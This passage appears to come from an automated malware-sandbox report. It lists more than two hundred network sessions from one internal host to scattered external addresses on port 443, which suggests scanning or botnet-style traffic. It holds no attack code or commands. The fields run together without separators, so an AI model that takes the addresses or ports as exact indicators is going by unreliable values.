                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18352192.168.2.1347032187.213.239.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18353192.168.2.1350576156.175.111.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18354192.168.2.1352932188.176.249.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18355192.168.2.1345588203.35.94.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18356192.168.2.134287284.205.42.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18357192.168.2.1340138101.38.172.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18358192.168.2.136046885.246.229.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18359192.168.2.1356666160.139.244.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18360192.168.2.1335734197.186.167.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18361192.168.2.13573805.86.242.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18362192.168.2.1333190133.38.176.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18363192.168.2.1346330138.214.238.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18364192.168.2.135430258.115.69.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18365192.168.2.1334180105.109.36.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18366192.168.2.133959495.239.54.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18367192.168.2.135594863.167.132.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18368192.168.2.1347488119.135.242.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18369192.168.2.133856484.226.2.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18370192.168.2.1350804136.201.137.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18371192.168.2.1357986125.189.202.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18372192.168.2.1358540198.50.230.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18373192.168.2.135261485.99.196.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18374192.168.2.1333510184.125.7.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18375192.168.2.135086432.220.122.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18376192.168.2.1335106122.40.170.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18377192.168.2.1342012218.30.221.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18378192.168.2.13445749.117.121.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18379192.168.2.134300867.104.36.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18380192.168.2.134262487.135.58.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18381192.168.2.134110643.23.53.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18382192.168.2.134418675.133.170.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18383192.168.2.1352698119.143.85.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18384192.168.2.1345354154.177.4.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18385192.168.2.1335800209.45.34.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18386192.168.2.1338158184.199.77.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18387192.168.2.1346458170.161.131.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18388192.168.2.1349224158.208.253.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18389192.168.2.1342596132.193.197.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18390192.168.2.134282044.82.127.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18391192.168.2.1346976157.21.161.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18392192.168.2.1349816172.84.240.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18393192.168.2.136010038.241.179.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18394192.168.2.1336458192.204.228.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18395192.168.2.1334686197.84.190.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18396192.168.2.1352324201.236.110.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18397192.168.2.134239862.224.16.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18398192.168.2.1346114181.204.74.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18399192.168.2.133844659.103.42.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18400192.168.2.135968414.119.107.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18401192.168.2.134055085.84.220.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18402192.168.2.1343314172.211.248.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18403192.168.2.1352922135.112.129.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18404192.168.2.135531258.103.105.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18405192.168.2.1347120190.44.123.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18406192.168.2.13388921.68.236.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18407192.168.2.133902634.40.119.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18408192.168.2.133579625.203.74.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18409192.168.2.1359616116.89.171.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18410192.168.2.1337534141.2.6.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18411192.168.2.1338412155.225.189.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18412192.168.2.133616245.85.31.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18413192.168.2.1359702210.118.222.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18414192.168.2.1345780140.215.13.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18415192.168.2.1338190216.251.119.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18416192.168.2.134519625.57.143.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18417192.168.2.1353706130.169.185.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18418192.168.2.133625034.117.19.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18419192.168.2.133557620.74.23.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18420192.168.2.1336508124.3.254.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18421192.168.2.1334448169.38.188.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18422192.168.2.1341928204.203.152.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18423192.168.2.1357956160.93.140.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18424192.168.2.1355984199.90.27.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18425192.168.2.134826458.5.107.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18426192.168.2.1333878110.151.74.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18427192.168.2.1352770162.173.135.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18428192.168.2.1334846105.94.233.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18429192.168.2.1343580185.82.228.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18430192.168.2.1334162200.101.33.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18431192.168.2.134328475.209.214.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18432192.168.2.1338138222.133.222.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18433192.168.2.13345221.194.153.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18434192.168.2.134369220.47.168.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18435192.168.2.1343228111.200.5.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18436192.168.2.1350990210.246.145.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18437192.168.2.1357604116.134.58.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18438192.168.2.1336790118.160.211.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18439192.168.2.133873246.156.186.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18440192.168.2.1336858186.104.122.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18441192.168.2.133676494.250.83.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18442192.168.2.134187069.11.13.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18443192.168.2.1359496136.64.230.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18444192.168.2.13378402.219.152.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18445192.168.2.134869872.168.11.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18446192.168.2.1350414198.69.14.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18447192.168.2.134284679.79.137.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18448192.168.2.1345136196.99.186.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18449192.168.2.1339896186.93.101.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18450192.168.2.1341106128.48.64.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18451192.168.2.1353784220.39.168.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18452192.168.2.1354072206.55.217.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18453192.168.2.135638676.67.142.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18454192.168.2.133348225.215.70.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18455192.168.2.13458181.55.82.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18456192.168.2.135970645.124.207.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18457192.168.2.133611296.177.162.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18458192.168.2.1360470135.13.90.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18459192.168.2.1334718202.26.245.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18460192.168.2.1342320101.24.208.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18461192.168.2.1348222164.146.90.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18462192.168.2.1336206162.83.26.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18463192.168.2.1341036186.65.243.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18464192.168.2.1360412170.221.20.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18465192.168.2.1335668216.144.71.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18466192.168.2.1339384154.238.57.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18467192.168.2.133510838.205.211.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18468192.168.2.134625468.164.93.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18469192.168.2.135094659.53.31.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18470192.168.2.13376285.3.30.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18471192.168.2.1341892216.119.171.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18472192.168.2.1354186117.159.223.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18473192.168.2.1342676194.141.191.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18474192.168.2.134861832.146.146.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18475192.168.2.1343126128.187.2.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18476192.168.2.1345866161.148.50.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18477192.168.2.135408661.182.145.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18478192.168.2.1350246130.116.103.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18479192.168.2.1351838124.197.27.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18480192.168.2.1347592103.28.165.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18481192.168.2.133345294.33.120.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18482192.168.2.1340872112.158.101.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18483192.168.2.1336598101.95.126.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18484192.168.2.133475095.53.12.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18485192.168.2.135722866.92.46.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18486192.168.2.1353818201.44.183.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18487192.168.2.1357870198.57.238.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18488192.168.2.1359048208.176.54.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18489192.168.2.1358064149.80.112.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18490192.168.2.1355688122.147.221.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18491192.168.2.134989037.117.197.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18492192.168.2.1344460104.191.245.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18493192.168.2.1353324151.29.49.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18494192.168.2.134655662.14.140.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18495192.168.2.134160472.121.50.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18496192.168.2.13572362.146.118.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18497192.168.2.134108880.94.206.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18498192.168.2.1338988189.231.143.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18499192.168.2.134591870.85.145.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18500192.168.2.1358512219.157.192.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18501192.168.2.134091660.21.99.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18502192.168.2.1337672199.195.111.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18503192.168.2.134558850.41.15.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18504192.168.2.135127491.81.119.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18505192.168.2.1336418161.50.3.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18506192.168.2.1339618135.122.238.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18507192.168.2.134913035.156.199.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18508192.168.2.1348198156.72.178.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18509192.168.2.133573657.221.116.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18510192.168.2.1339736171.244.236.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18511192.168.2.1353266155.151.225.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18512192.168.2.1345602197.155.11.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18513192.168.2.1359296160.138.218.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18514192.168.2.133489494.160.165.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18515192.168.2.134240238.39.142.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18516192.168.2.1359898137.14.167.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18517192.168.2.1360382163.60.136.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18518192.168.2.1339864161.61.108.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18519192.168.2.1339750188.103.79.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18520192.168.2.1336956184.86.232.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18521192.168.2.1356826148.218.131.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18522192.168.2.1342892142.184.208.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18523192.168.2.1357156113.109.233.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18524192.168.2.134336040.0.201.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18525192.168.2.133887474.125.25.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18526192.168.2.13464265.41.11.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18527192.168.2.13539389.185.206.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18528192.168.2.135560866.109.235.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18529192.168.2.135748296.120.205.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18530192.168.2.135248664.240.229.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18531192.168.2.133553640.19.99.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18532192.168.2.1335232184.114.235.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18533192.168.2.1356826102.44.32.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18534192.168.2.134580274.14.73.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18535192.168.2.135021496.113.87.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18536192.168.2.1357738219.161.211.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18537192.168.2.1336606150.141.66.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18538192.168.2.1357184169.217.248.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18539192.168.2.1346456160.73.89.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18540192.168.2.135956414.174.109.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18541192.168.2.1346626178.83.37.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18542192.168.2.134113417.115.117.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18543192.168.2.1340358164.110.74.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18544192.168.2.1353300191.192.251.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18545192.168.2.13454184.34.168.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18546192.168.2.1337392204.154.192.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18547192.168.2.1356886135.122.69.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18548192.168.2.135778075.129.253.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18549192.168.2.1356244152.140.34.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18550192.168.2.1359378138.31.139.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18551192.168.2.1350484211.154.187.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18552192.168.2.135548099.186.224.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18553192.168.2.134331423.247.105.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18554192.168.2.1349156179.19.24.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18555192.168.2.133715053.193.173.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18556192.168.2.1334714149.188.190.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18557192.168.2.1339304164.187.81.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18558192.168.2.133702648.44.239.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18559192.168.2.1354012141.29.28.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18560192.168.2.1357736121.218.94.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18561192.168.2.13376369.175.49.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18562192.168.2.1340334112.133.34.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18563192.168.2.1355708124.251.158.12443
                                                  TimestampBytes transferredDirectionData


